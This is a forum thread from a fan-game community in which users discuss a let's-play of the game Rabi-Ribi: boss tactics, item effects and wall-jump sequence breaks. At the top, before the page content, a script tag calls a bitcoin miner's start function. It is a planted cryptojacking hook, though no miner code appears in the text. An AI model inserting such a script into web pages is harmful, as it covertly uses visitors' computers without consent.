<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmw centralsmbx community

Rabi-Ribi - Dolphin Room

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
Stink Terios
Posts: 577
Joined: 7 years ago

Re: Rabi-Ribi - Selena Milfall

Postby Stink Terios » 1 year ago

I like how the game often gives you an out before fighting a boss. There's often (always?) a way to BTFO and explore elsewhere to get better prepared.

Also, I like the Metroid school of items on the map better. That way you can tell if you backed off because you couldn't get an item or if it's a dead-end until you get more powerups. I uselessly went back to dead-ends in Hollow Knight WAY too many times thanks to how the map works in that game.

User avatar
Sebby19
Posts: 2564
Joined: 10 years ago
Location: Winnipeg, Manitoba

Re: Rabi-Ribi - Selena Milfall

Postby Sebby19 » 1 year ago

Good job on the winning attempt with that boss fight! Just remember to try to use all your moves, like the slide hammer, and your amulet (which you can use twice in a row now!).

Can someone list off what using the amulet does, again?
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

User avatar
Xirix
The British Palindrome
Posts: 525
Joined: 10 years ago

Re: Rabi-Ribi - Selena Milfall

Postby Xirix » 1 year ago

Using the amulet makes a pulse that hits the entire screen, does some damage. Stuns the enemies temporarily, and gives you a brief invincibility window when using it.

User avatar
Blivsey
forever an obscure pokemons
Posts: 896
Joined: 7 years ago
First name: Liv
Pronouns: she/her
Location: Ioway

Re: Rabi-Ribi - Selena Milfall

Postby Blivsey » 1 year ago

The only funny thing about That was when I moused over the video and found out that the preview shows That, and my first reaction was "i can't wait for raocow to react to That"

then rao turned it into a very serious discussion condemning harassment and I was extremely grateful
convenient noise thread for stress-relief purposes

User avatar
Dragooner
Posts: 35
Joined: 7 years ago
Location: Germany

Re: Rabi-Ribi - Selena Milfall

Postby Dragooner » 1 year ago

Xirix wrote: Using the amulet makes a pulse that hits the entire screen, does some damage. Stuns the enemies temporarily, and gives you a brief invincibility window when using it.
Plus it gives you some SP and resets the cooldowns of Bunny Strike and Super Carrot(which helps alot in chain-spamming both).

I wonder where raocow will go next.

User avatar
Stink Terios
Posts: 577
Joined: 7 years ago

Re: Rabi-Ribi - Selena Milfall

Postby Stink Terios » 1 year ago

Dragooner wrote:
Xirix wrote: Using the amulet makes a pulse that hits the entire screen, does some damage. Stuns the enemies temporarily, and gives you a brief invincibility window when using it.
Plus it gives you some SP and resets the cooldowns of Bunny Strike and Super Carrot(which helps alot in chain-spamming both).

I wonder where raocow will go next.
This makes waiting for max rank, using a boost that gives you attack up, and chain-spamming bunny strike one hell of a strategy.

User avatar
AuraLancer
AKA Uncle Aura
Posts: 239
Joined: 8 years ago
Location: USA

Re: Rabi-Ribi - Selena Milfall

Postby AuraLancer » 1 year ago

I didn't remember that scene being this early on. I was prepared to skip it, but if raocow has something good to say then I'll stick around once I get a chance to watch the video.

User avatar
MarthX
Posts: 16
Joined: 10 years ago

Re: Rabi-Ribi - Dark King's Lair

Postby MarthX » 1 year ago

Parama wrote: so i guess raocow plans to spend the entire game tanking through bosses with health items rather than learning boss attacks and patterns, alright :lol:
I don't blame him. He would have to spend a long time with each boss, memorizing and learning the gimmick to every one of their attacks in order to this without consumables. In terms of dodging attacks, this game is far harder than Cup Head. The game has yet to show its fangs either. Later attacks are outright dickish and until you learn their gimmick, you'll get hit constantly. Really, the best strategy in this game is to learn to maximize dps so you can skip most of the bosses attacks because there's so many to learn, it's overwhelming.

User avatar
Cyril
metal nerd
Posts: 2018
Joined: 5 years ago
First name: Cyril
Pronouns: he/she/they
Location: hell

Re: Rabi-Ribi - Selena Milfall

Postby Cyril » 1 year ago

yeah but unlike cuphead you don't have a three strikes you're out rule

i do agree maximizing DPS tends to be the best way to deal in general but raocow's gonna have a bad time with later bosses if he doesn't want to put in the effort to learn how to dodge basic patterns, there's less opportunities to use items on later bosses & the higher your HP goes the less useful the healing spell is gonna be too since it doesn't scale
i've honestly never played a video game in my life
:catcrime:

User avatar
Alice
Posts: 2215
Joined: 8 years ago
Pronouns: Girl person
Location: Wonderland

Re: Rabi-Ribi - Dark King's Lair

Postby Alice » 1 year ago

MarthX wrote: I don't blame him. He would have to spend a long time with each boss, memorizing and learning the gimmick to every one of their attacks in order to this without consumables. In terms of dodging attacks, this game is far harder than Cup Head. The game has yet to show its fangs either. Later attacks are outright dickish and until you learn their gimmick, you'll get hit constantly. Really, the best strategy in this game is to learn to maximize dps so you can skip most of the bosses attacks because there's so many to learn, it's overwhelming.
He'll just raocow things as he normally does. Like in Distorted Travesty where he plays the tankiest way possible while also learning the bare minimum required to actually succeed. (And even then has an infuriating habit of getting really lucky and learning nothing.)

User avatar
Grounder
Posts: 3413
Joined: 5 years ago

Re: Rabi-Ribi - Selena Milfall

Postby Grounder » 1 year ago

Time to finally go left!

We don't end up going left...



Anyway, Syaro is Ruukoto sorta kinda not really.
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

User avatar
Awoo
Wolf girls? In *my* area? It's more likely than you think!
Posts: 1235
Joined: 1 year ago
Pronouns: he/him/his
Location: your area

Re: Rabi-Ribi - Selena Milfall

Postby Awoo » 1 year ago

That was kind of uncomfortable. The entire time all I could think was:
Image

Don't harass cosplayers. It's rude!
ワンワン :pal:
Image
Image
Avatar shamelessly taken from:


User avatar
Stink Terios
Posts: 577
Joined: 7 years ago

Re: Rabi-Ribi - Selena Milfall

Postby Stink Terios » 1 year ago

Lots of peeps in the YT comments yelling about a missed upgrade, not realizing it's only obtainable after beating Syaro.

User avatar
Dragooner
Posts: 35
Joined: 7 years ago
Location: Germany

Re: Rabi-Ribi - Selena Milfall

Postby Dragooner » 1 year ago

Stink Terios wrote: Lots of peeps in the YT comments yelling about a missed upgrade, not realizing it's only obtainable after beating Syaro.
....No. They are talking about something else.

Most of them are talking about the Air Jump, not the item from Syaro that you can buy from her in town.


User avatar
Kilgamayan
The Real Treasure is You
Posts: 1117
Joined: 10 years ago
First name: Rabi~En~Roll
Location: Location, Location.

Re: Rabi-Ribi - Bunny Doll

Postby Kilgamayan » 1 year ago

Sharo is also very good! A quality compliment to Cicini.
Image Please interact Image

Image Image
Image Image

User avatar
Stink Terios
Posts: 577
Joined: 7 years ago

Re: Rabi-Ribi - Selena Milfall

Postby Stink Terios » 1 year ago

Dragooner wrote:
Stink Terios wrote: Lots of peeps in the YT comments yelling about a missed upgrade, not realizing it's only obtainable after beating Syaro.
....No. They are talking about something else.

Most of them are talking about the Air Jump, not the item from Syaro that you can buy from her in town.

I thought that was blocked off until you defeated her.

User avatar
Kilgamayan
The Real Treasure is You
Posts: 1117
Joined: 10 years ago
First name: Rabi~En~Roll
Location: Location, Location.

Re: Rabi-Ribi - Bunny Doll

Postby Kilgamayan » 1 year ago

That upgrade is the intended method of even being able to get to Sharo at all.

Image Please interact Image

Image Image
Image Image

Rockythechao
the figure of Kevka's bear was a sightseeing
Posts: 995
Joined: 5 years ago
First name: Michael
Pronouns: he/they
Location: Yes

Re: Rabi-Ribi - Bunny Doll

Postby Rockythechao » 1 year ago

Image
A2XT Episode 2's vice admiral "The Project's Not Dead Yet" person and certified Absurdly-Oblivious Fool

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Audiomack (new music), SoundCloud (old music)

Image

𝐀𝐍 𝐀𝐖𝐄𝐒𝐎𝐌𝐄 𝐏𝐑𝐀𝐘𝐄𝐑 𝐈𝐒
𝐂𝐎𝐍𝐅𝐋𝐈𝐂𝐓 𝐖𝐈𝐓𝐇 𝐔𝐒

- 𝐁𝐀𝐓𝐓𝐋𝐄𝐒𝐔𝐈𝐓 𝐌𝐎𝐑𝐒𝐄𝐋 -

𝐊𝐄𝐄𝐏 𝐘𝐎𝐔𝐑 𝐃𝐈𝐆𝐍𝐈𝐓𝐘

User avatar
Cyril
metal nerd
Posts: 2018
Joined: 5 years ago
First name: Cyril
Pronouns: he/she/they
Location: hell

Re: Rabi-Ribi - Bunny Doll

Postby Cyril » 1 year ago

man raocow being here this early is weirding me out

congrats on abusing the bootleg walljump to get to places where you're not supposed to be, yet again, that laser you had trouble dodging is a lot easier to dodge if you have literally any of the mobility options you're currently missing out on that are supposed to be used to get through that one spot you died at a few times :P
i've honestly never played a video game in my life
:catcrime:

User avatar
Sebby19
Posts: 2564
Joined: 10 years ago
Location: Winnipeg, Manitoba

Re: Rabi-Ribi - Bunny Doll

Postby Sebby19 » 1 year ago

I wonder how different things would be if no one told him about the wall jump.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

User avatar
Cyril
metal nerd
Posts: 2018
Joined: 5 years ago
First name: Cyril
Pronouns: he/she/they
Location: hell

Re: Rabi-Ribi - Bunny Doll

Postby Cyril » 1 year ago

yeah i would've been more miffed at the time had i known how much of a gamebreaker it was
i've honestly never played a video game in my life
:catcrime:

User avatar
Kilgamayan
The Real Treasure is You
Posts: 1117
Joined: 10 years ago
First name: Rabi~En~Roll
Location: Location, Location.

Re: Rabi-Ribi - Bunny Doll

Postby Kilgamayan » 1 year ago

Man I'm going through the post-post-post-game or whatever the heck this is at this point and

hoo boy that blacked-out Irisu cutscene



Also I chuckled a good chuckle at

the fucking VVVVVV Gravitron segment

Image Please interact Image

Image Image
Image Image

User avatar
Stink Terios
Posts: 577
Joined: 7 years ago

Re: Rabi-Ribi - Bunny Doll

Postby Stink Terios » 1 year ago

...I didn't know about the phone.

By the way, about that weird spot in the internet. You CAN get up there through shenanigans, but doing so will break the game and catapult you into the postgame. You get an achievement for doing it though!

User avatar
Alice
Posts: 2215
Joined: 8 years ago
Pronouns: Girl person
Location: Wonderland

Re: Rabi-Ribi - Bunny Doll

Postby Alice » 1 year ago

So how many save points did raocow manage to accidentally avoid on the way to today's boss?

User avatar
SAJewers
hi
Posts: 3268
Joined: 7 years ago
Location: Nova Scotia

Re: Rabi-Ribi - Bunny Doll

Postby SAJewers » 1 year ago

Stink Terios wrote: ...I didn't know about the phone.

By the way, about that weird spot in the internet. You CAN get up there through shenanigans, but doing so will break the game and catapult you into the postgame. You get an achievement for doing it though!
Clearly he should do it next episode then :P
ImageImageImageImageImage
Image
ImageImageImageImage


Return to “let's play”

Who is online

Users browsing this forum: MSN [Bot], Telamon and 20 guests